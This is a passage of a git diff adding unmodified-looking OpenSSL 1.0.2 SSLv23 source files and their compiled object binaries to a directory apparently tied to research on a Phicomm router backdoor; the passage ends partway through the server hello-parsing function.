+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <openssl/objects.h>
+#include "ssl_locl.h"
+
+static const SSL_METHOD *ssl23_get_method(int ver);
+static const SSL_METHOD *ssl23_get_method(int ver)
+{
+#ifndef OPENSSL_NO_SSL2
+    if (ver == SSL2_VERSION)
+        return (SSLv2_method());
+    else
+#endif
+#ifndef OPENSSL_NO_SSL3
+    if (ver == SSL3_VERSION)
+        return (SSLv3_method());
+    else
+#endif
+#ifndef OPENSSL_NO_TLS1
+    if (ver == TLS1_VERSION)
+        return (TLSv1_method());
+    else if (ver == TLS1_1_VERSION)
+        return (TLSv1_1_method());
+    else if (ver == TLS1_2_VERSION)
+        return (TLSv1_2_method());
+    else
+#endif
+        return (NULL);
+}
+
+IMPLEMENT_ssl23_meth_func(SSLv23_method,
+                          ssl23_accept, ssl23_connect, ssl23_get_method)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s23_meth.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s23_meth.o
new file mode 100644
index 0000000000000000000000000000000000000000..a24fa7b0693d4706603da9be0a02a96915ff9d1c
GIT binary patch
literal 4016
zcmd^?J!~9B6vyX$F)<M0Bzy$|$pHZzAgepud?ZNd5@S2XDM8qgK#H{4+Z+2%x!XPM
z&iW%oND3qxqDVBMvqXbLlQIp+Qku{piWDhRP=pSI5C|d6`|rM4&n-6%l#F!u{_i*M
z&CHvf+ui$UwlOzSDhb_6;vKQ=X)44|4{z&wD(hlg>=wU_AN=FWR;esRGWsL<m8}ue
zDQ`Qq&0B~*_30?$ZsAJ^^#3o~{LIYp%EZ}b5~!qd%$ahkM{92;sav}=S#_$@M>3r4
z#tt%j=!3nQKYdn=2(byKx9c&|Xr+tqi_+Sj(t%w&$F9+ZL(Vg4j}Q)9uqx|aY;6YD
zeuwyZYgm7I=*hsE^r{B4$~023Vg3<g9KFV8iI>u9vyA&jV%gvZrdh{KH`itHV6IJ3
z77v+juFGO)uC;iB1oo}i8U%*%4=ucH;j6^=QN_A`eO*4b#9y`W&n^553%_CE-&pv!
z7JkRV?^*b77XFuokMmik?tym5!mAeku7#hr@N*WPSol>7|H{I@w(##P{09sF)x!7E
zjbhmOJZ#}2o}6-fQnejl#BrCLWvNmSw#33hV}-lJmfP}_=hUXBtH*>p-#ByfM8iEZ
zH@7gm=q{c(*_d_3Vq;;YrgJl=;7;n^fsuvk#x*yPtC{e-(u*>=6iLa;@_b+R6+3<y
z1k%@DB)t}Q^rgJOay9CxG}%ppmR#xtvgIx%fv-AYfDkuKBXz-X>@BC^Q!d7Ho9jx(
zh?{cLkxbC)#C=csZP)9{C|$*r>#L}nh5KqP_jo`3PQNW98p8G4R9m*u{Y1I{>@ZeK
zRmN&y%`{w)^f)VB-M|DqFjea%UFE7yPlk!&>oV!ez)vqC!i;HF!p`8%P%&P&+w}Yk
zc^#;asv5xQ@A7s2b<*)l@1lQhW$h8>cmhCc{<Oh&8~kO1j~iUy;pw=Gy&MCh&p7x#
zgYRbz{;0t#2G`F{pb3LN&Kjm_@FxuZmcgGic-`Q74M3+1{uFDN_bmJagX_HlI&bg;
ztYPqcK|{UzxevdOFKXa;w(7RV0{ozcWG}M@Kg1g56V~7r)-cytgFnX_<~nQe=UKyS
zum*pDHO!Z+!4I>BxxpIzMb<DkS%c%u>9)xN{3Q*^-Zr>CV?f^<e1bL1U4tJn_&tNa
zV(<!Uti@c<bb;&Vyl~?6p7NSxRg~GbR*~#_j*@FiIJnmery0k>NojiTCFMk+aQv{>
zlL18qp^^^09UhGp{aD#w4icvyg?+j+t#h_)yGxPRlf0(?Vk(r3J$|4tNS*!T1&&y=
z;q2m`P&Xm`u?(DNj`tztG8X%p<Jy83-#9OFf6)}@e~kh#=D*Fyd*QJ8FB3<*pPBr-
zlB-PA$PBB0gA3i@LxlQA=~JwKh8X6r(#LFVF7#CslGgQW+c20J`k4+e;gHyK#PGIk
zo^_;L=llvBqv`c)q(~sNn17S=>pGBaF+U_eZ2#)~|5Wb__789SI$xikVRK`u-+BHq
r3{DNtER0di$3KhW*&&qwAl@z%#>1u|_`)-6Sbm?^e<_d5L^1zwDgSe&

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s23_pkt.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s23_pkt.c
new file mode 100644
index 0000000..efc8647
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s23_pkt.c
@@ -0,0 +1,113 @@
+/* ssl/s23_pkt.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <errno.h>
+#define USE_SOCKETS
+#include "ssl_locl.h"
+#include <openssl/evp.h>
+#include <openssl/buffer.h>
+
+int ssl23_write_bytes(SSL *s)
+{
+    int i, num, tot;
+    char *buf;
+
+    buf = s->init_buf->data;
+    tot = s->init_off;
+    num = s->init_num;
+    for (;;) {
+        s->rwstate = SSL_WRITING;
+        i = BIO_write(s->wbio, &(buf[tot]), num);
+        if (i <= 0) {
+            s->init_off = tot;
+            s->init_num = num;
+            return (i);
+        }
+        s->rwstate = SSL_NOTHING;
+        if (i == num)
+            return (tot + i);
+
+        num -= i;
+        tot += i;
+    }
+}
+
+/* return regularly only when we have read (at least) 'n' bytes */
+int ssl23_read_bytes(SSL *s, int n)
+{
+    unsigned char *p;
+    int j;
+
+    if (s->packet_length < (unsigned int)n) {
+        p = s->packet;
+
+        for (;;) {
+            s->rwstate = SSL_READING;
+            j = BIO_read(s->rbio, (char *)&(p[s->packet_length]),
+                         n - s->packet_length);
+            if (j <= 0)
+                return (j);
+            s->rwstate = SSL_NOTHING;
+            s->packet_length += j;
+            if (s->packet_length >= (unsigned int)n)
+                return (s->packet_length);
+        }
+    }
+    return (n);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s23_pkt.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s23_pkt.o
new file mode 100644
index 0000000000000000000000000000000000000000..645cefebee53c7bae68969653338b121bfbf87df
GIT binary patch
literal 1912
zcmbu8-%ry}6vuD3Ayc6a;=>|p`ea6wX8cHWB${;_8<6rt*`iTN*^kN$>_^rv15Ln$
zNYWG&9{n%;7f1%^gD?IEJ{g0FzkN{?Jg2)CN-ZyXlJ=bYx#xRN@4ct1BXZKiafBI1
zZji$fql8@Z9mY{BjFL{$LB5^2_*2SA>CDWi@$2TOnVL?R^98dqC!0n8%Xr8Gxnue7
zqvqqFu_tpM-=p^F)@nz>$QLAI+gO<U&<%N5Q{uKGJG!rT=fm#Zgz@&?taM+RZDIxE
zbEHw#Bq(G2n32u-A`~;Vs<8*_20-lvb?;Z1dq<aF>GH;_bX6l>jqEhu;A+h#NyX#C
zLMW4~m-V_35eLO^U;ov*HSAv*2#evN-WJC11jB6y;Aw*=HJKr>pDkoq5$$Zt5$@3~
z!Yu{3o{o0^CTwO1_<1^)L!aaW&pa_cxZ#y}VcjS3p|!RIANGv%p#(2Td@#lbV!Zzf
zq^7BE0{sLZ*zmygx;M@XYrX~_l&nOlx%-;txj8&fANjKHHs^J{VcZkj)lrq#I)$SQ
zM_zK`Z)oxMW4Qkqj;DLnPQ$R<_MO%l0=obY-iOl$0l4w&z;PX>x6TyU<T3d~8yHlo
z3%ZymnzjgWqxMi&mE5wfYD7uNQ!z<arjp5-k+hPQV)BSWVq;USEUKuf*#Z^d6b=dL
zhk9t(JGi&s`z_l<2!^~99>xWT(V*X~#~Q%v4h<M*`y!&YT+*{S@OrJ~i!7?Ci&;@u
zmvkZ)vU-+?IZY#CzEUcwWnkrsu8PpxeVU%lFVOLPxh_^~m8x3Pmx*Ytpca(}wQNac
zpYmT`05$fgvxB0*&|b9M!5ee!)&m1Pv#1?HT%;`=ru-Cm)UwVCQhteYXUBh{^G@fi
zkN+vI`LBBH2V9eVCxn)<`j;7?p4Df57&wdVsps6FOYS%@{7bQq>?TmXV22R1^J5tM
z4pW`_DAhk<iPSswv%uZ%@43tUp_b{{{khe~Qd_kCH1+teopjM7bKV^w5}@!l4s1r3
TJ0M*Ux#?d~xOkA+3Y_{sKLW_F

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s23_srvr.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s23_srvr.c
new file mode 100644
index 0000000..470bd3d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s23_srvr.c
@@ -0,0 +1,652 @@
+/* ssl/s23_srvr.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "ssl_locl.h"
+#include <openssl/buffer.h>
+#include <openssl/rand.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+#endif
+
+static const SSL_METHOD *ssl23_get_server_method(int ver);
+int ssl23_get_client_hello(SSL *s);
+static const SSL_METHOD *ssl23_get_server_method(int ver)
+{
+#ifndef OPENSSL_NO_SSL2
+    if (ver == SSL2_VERSION)
+        return (SSLv2_server_method());
+#endif
+#ifndef OPENSSL_NO_SSL3
+    if (ver == SSL3_VERSION)
+        return (SSLv3_server_method());
+#endif
+    if (ver == TLS1_VERSION)
+        return (TLSv1_server_method());
+    else if (ver == TLS1_1_VERSION)
+        return (TLSv1_1_server_method());
+    else if (ver == TLS1_2_VERSION)
+        return (TLSv1_2_server_method());
+    else
+        return (NULL);
+}
+
+IMPLEMENT_ssl23_meth_func(SSLv23_server_method,
+                          ssl23_accept,
+                          ssl_undefined_function, ssl23_get_server_method)
+
+int ssl23_accept(SSL *s)
+{
+    BUF_MEM *buf;
+    unsigned long Time = (unsigned long)time(NULL);
+    void (*cb) (const SSL *ssl, int type, int val) = NULL;
+    int ret = -1;
+    int new_state, state;
+
+    RAND_add(&Time, sizeof(Time), 0);
+    ERR_clear_error();
+    clear_sys_error();
+
+    if (s->info_callback != NULL)
+        cb = s->info_callback;
+    else if (s->ctx->info_callback != NULL)
+        cb = s->ctx->info_callback;
+
+    s->in_handshake++;
+    if (!SSL_in_init(s) || SSL_in_before(s))
+        SSL_clear(s);
+
+    for (;;) {
+        state = s->state;
+
+        switch (s->state) {
+        case SSL_ST_BEFORE:
+        case SSL_ST_ACCEPT:
+        case SSL_ST_BEFORE | SSL_ST_ACCEPT:
+        case SSL_ST_OK | SSL_ST_ACCEPT:
+
+            s->server = 1;
+            if (cb != NULL)
+                cb(s, SSL_CB_HANDSHAKE_START, 1);
+
+            /* s->version=SSL3_VERSION; */
+            s->type = SSL_ST_ACCEPT;
+
+            if (s->init_buf == NULL) {
+                if ((buf = BUF_MEM_new()) == NULL) {
+                    ret = -1;
+                    goto end;
+                }
+                if (!BUF_MEM_grow(buf, SSL3_RT_MAX_PLAIN_LENGTH)) {
+                    BUF_MEM_free(buf);
+                    ret = -1;
+                    goto end;
+                }
+                s->init_buf = buf;
+            }
+
+            ssl3_init_finished_mac(s);
+
+            s->state = SSL23_ST_SR_CLNT_HELLO_A;
+            s->ctx->stats.sess_accept++;
+            s->init_num = 0;
+            break;
+
+        case SSL23_ST_SR_CLNT_HELLO_A:
+        case SSL23_ST_SR_CLNT_HELLO_B:
+
+            s->shutdown = 0;
+            ret = ssl23_get_client_hello(s);
+            if (ret >= 0)
+                cb = NULL;
+            goto end;
+            /* break; */
+
+        default:
+            SSLerr(SSL_F_SSL23_ACCEPT, SSL_R_UNKNOWN_STATE);
+            ret = -1;
+            goto end;
+            /* break; */
+        }
+
+        if ((cb != NULL) && (s->state != state)) {
+            new_state = s->state;
+            s->state = state;
+            cb(s, SSL_CB_ACCEPT_LOOP, 1);
+            s->state = new_state;
+        }
+    }
+ end:
+    s->in_handshake--;
+    if (cb != NULL)
+        cb(s, SSL_CB_ACCEPT_EXIT, ret);
+    return (ret);
+}
+
+int ssl23_get_client_hello(SSL *s)
+{
+    /*-
+     * Request this many bytes in initial read.
+     * We can detect SSL 3.0/TLS 1.0 Client Hellos
+     * ('type == 3') correctly only when the following
+     * is in a single record, which is not guaranteed by
+     * the protocol specification:
+     * Byte  Content
+     *  0     type            \
+     *  1/2   version          > record header
+     *  3/4   length          /
+     *  5     msg_type        \
+     *  6-8   length           > Client Hello message
+     *  9/10  client_version  /
+     */
+    char buf_space[11];
+    char *buf = &(buf_space[0]);
+    unsigned char *p, *d, *d_len, *dd;
+    unsigned int i;
+    unsigned int csl, sil, cl;
+    int n = 0, j;
+    int type = 0;
+    int v[2];
+
+    if (s->state == SSL23_ST_SR_CLNT_HELLO_A) {
+        /* read the initial header */
+        v[0] = v[1] = 0;
+
+        if (!ssl3_setup_buffers(s))
+            goto err;
+
+        n = ssl23_read_bytes(s, sizeof buf_space);
+        if (n != sizeof buf_space)
+            return (n);         /* n == -1 || n == 0 */
+
+        p = s->packet;
+
+        memcpy(buf, p, n);
+
+        if ((p[0] & 0x80) && (p[2] == SSL2_MT_CLIENT_HELLO)) {
+            /*
+             * SSLv2 header
+             */
+            if ((p[3] == 0x00) && (p[4] == 0x02)) {
+                v[0] = p[3];
+                v[1] = p[4];
+                /* SSLv2 */
+                if (!(s->options & SSL_OP_NO_SSLv2))
+                    type = 1;
+            } else if (p[3] == SSL3_VERSION_MAJOR) {
+                v[0] = p[3];
+                v[1] = p[4];
+                /* SSLv3/TLSv1 */
+                if (p[4] >= TLS1_VERSION_MINOR) {
+                    if (p[4] >= TLS1_2_VERSION_MINOR &&
+                        !(s->options & SSL_OP_NO_TLSv1_2)) {
+                        s->version = TLS1_2_VERSION;
+                        s->state = SSL23_ST_SR_CLNT_HELLO_B;
+                    } else if (p[4] >= TLS1_1_VERSION_MINOR &&
+                               !(s->options & SSL_OP_NO_TLSv1_1)) {
+                        s->version = TLS1_1_VERSION;
+                        /*
+                         * type=2;
+                         *//*
+                         * done later to survive restarts
+                         */
+                        s->state = SSL23_ST_SR_CLNT_HELLO_B;
+                    } else if (!(s->options & SSL_OP_NO_TLSv1)) {
+                        s->version = TLS1_VERSION;
+                        /*
+                         * type=2;
+                         *//*
+                         * done later to survive restarts
+                         */
+                        s->state = SSL23_ST_SR_CLNT_HELLO_B;
+                    } else if (!(s->options & SSL_OP_NO_SSLv3)) {
+                        s->version = SSL3_VERSION;
+                        /* type=2; */
+                        s->state = SSL23_ST_SR_CLNT_HELLO_B;
+                    } else if (!(s->options & SSL_OP_NO_SSLv2)) {
+                        type = 1;
+                    }
+                } else if (!(s->options & SSL_OP_NO_SSLv3)) {
+                    s->version = SSL3_VERSION;
+                    /* type=2; */
+                    s->state = SSL23_ST_SR_CLNT_HELLO_B;
+                } else if (!(s->options & SSL_OP_NO_SSLv2))
+                    type = 1;
+
+            }
+        }
+        /* p[4] < 5 ... silly record length? */
+        else if ((p[0] == SSL3_RT_HANDSHAKE) &&
+                 (p[1] == SSL3_VERSION_MAJOR) &&
+                 (p[5] == SSL3_MT_CLIENT_HELLO) && ((p[3] == 0 && p[4] < 5)
+                                                    || (p[9] >= p[1]))) {
+            /*
+             * SSLv3 or tls1 header
+             */
+
+            v[0] = p[1];        /* major version (= SSL3_VERSION_MAJOR) */
+            /*
+             * We must look at client_version inside the Client Hello message
+             * to get the correct minor version. However if we have only a
+             * pathologically small fragment of the Client Hello message, this
+             * would be difficult, and we'd have to read more records to find
+             * out. No known SSL 3.0 client fragments ClientHello like this,
+             * so we simply reject such connections to avoid protocol version
+             * downgrade attacks.
+             */
+            if (p[3] == 0 && p[4] < 6) {
+                SSLerr(SSL_F_SSL23_GET_CLIENT_HELLO, SSL_R_RECORD_TOO_SMALL);
+                goto err;
+            }
+            /*
+             * if major version number > 3 set minor to a value which will
+             * use the highest version 3 we support. If TLS 2.0 ever appears
+             * we will need to revise this....
+             */
+            if (p[9] > SSL3_VERSION_MAJOR)
+                v[1] = 0xff;
+            else
+                v[1] = p[10];   /* minor version according to client_version */
+            if (v[1] >= TLS1_VERSION_MINOR) {
+                if (v[1] >= TLS1_2_VERSION_MINOR &&
+                    !(s->options & SSL_OP_NO_TLSv1_2)) {
+                    s->version = TLS1_2_VERSION;
+                    type = 3;
+                } else if (v[1] >= TLS1_1_VERSION_MINOR &&
+                           !(s->options & SSL_OP_NO_TLSv1_1)) {
+                    s->version = TLS1_1_VERSION;
+                    type = 3;
+                } else if (!(s->options & SSL_OP_NO_TLSv1)) {
+                    s->version = TLS1_VERSION;
+                    type = 3;
+                } else if (!(s->options & SSL_OP_NO_SSLv3)) {
+                    s->version = SSL3_VERSION;
+                    type = 3;
+                }
+            } else {
+                /* client requests SSL 3.0 */
+                if (!(s->options & SSL_OP_NO_SSLv3)) {
+                    s->version = SSL3_VERSION;
+                    type = 3;
+                } else if (!(s->options & SSL_OP_NO_TLSv1)) {
+                    /*
+                     * we won't be able to use TLS of course, but this will
+                     * send an appropriate alert
+                     */
+                    s->version = TLS1_VERSION;
+                    type = 3;
+                }
+            }
+        } else if ((strncmp("GET ", (char *)p, 4) == 0) ||
+                   (strncmp("POST ", (char *)p, 5) == 0) ||
+                   (strncmp("HEAD ", (char *)p, 5) == 0) ||
+                   (strncmp("PUT ", (char *)p, 4) == 0)) {
+            SSLerr(SSL_F_SSL23_GET_CLIENT_HELLO, SSL_R_HTTP_REQUEST);
+            goto err;
+        } else if (strncmp("CONNECT", (char *)p, 7) == 0) {
+            SSLerr(SSL_F_SSL23_GET_CLIENT_HELLO, SSL_R_HTTPS_PROXY_REQUEST);
+            goto err;
+        }
+    }
+
+    /* ensure that TLS_MAX_VERSION is up-to-date */
+    OPENSSL_assert(s->version <= TLS_MAX_VERSION);
+
+    if (s->version < TLS1_2_VERSION && tls1_suiteb(s)) {
+        SSLerr(SSL_F_SSL23_GET_CLIENT_HELLO,
+               SSL_R_ONLY_TLS_1_2_ALLOWED_IN_SUITEB_MODE);
+        goto err;
+    }
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode() && (s->version < TLS1_VERSION)) {
+        SSLerr(SSL_F_SSL23_GET_CLIENT_HELLO,
+               SSL_R_ONLY_TLS_ALLOWED_IN_FIPS_MODE);
+        goto err;
+    }
+#endif
+
+    if (s->state == SSL23_ST_SR_CLNT_HELLO_B) {
+        /*
+         * we have SSLv3/TLSv1 in an SSLv2 header (other cases skip this
+         * state)
+         */
+
+        type = 2;
+        p = s->packet;
+        v[0] = p[3];            /* == SSL3_VERSION_MAJOR */
+        v[1] = p[4];
+
+        /*-
+         * An SSLv3/TLSv1 backwards-compatible CLIENT-HELLO in an SSLv2
+         * header is sent directly on the wire, not wrapped as a TLS
+         * record. It's format is:
+         * Byte  Content
+         * 0-1   msg_length
+         * 2     msg_type
+         * 3-4   version
+         * 5-6   cipher_spec_length
+         * 7-8   session_id_length
+         * 9-10  challenge_length
+         * ...   ...
+         */
+        n = ((p[0] & 0x7f) << 8) | p[1];
+        if (n > (1024 * 4)) {
+            SSLerr(SSL_F_SSL23_GET_CLIENT_HELLO, SSL_R_RECORD_TOO_LARGE);
+            goto err;
+        }
+        if (n < 9) {
+            SSLerr(SSL_F_SSL23_GET_CLIENT_HELLO,
+                   SSL_R_RECORD_LENGTH_MISMATCH);
+            goto err;
+        }
+
+        j = ssl23_read_bytes(s, n + 2);
+        /*
+         * We previously read 11 bytes, so if j > 0, we must have j == n+2 ==
+         * s->packet_length. We have at least 11 valid packet bytes.
+         */
+        if (j <= 0)
+            return (j);
+
+        ssl3_finish_mac(s, s->packet + 2, s->packet_length - 2);
+
+        /* CLIENT-HELLO */
+        if (s->msg_callback)
+            s->msg_callback(0, SSL2_VERSION, 0, s->packet + 2,
+                            s->packet_length - 2, s, s->msg_callback_arg);
+
+        p = s->packet;
+        p += 5;
+        n2s(p, csl);
+        n2s(p, sil);
+        n2s(p, cl);
+        d = (unsigned char *)s->init_buf->data;
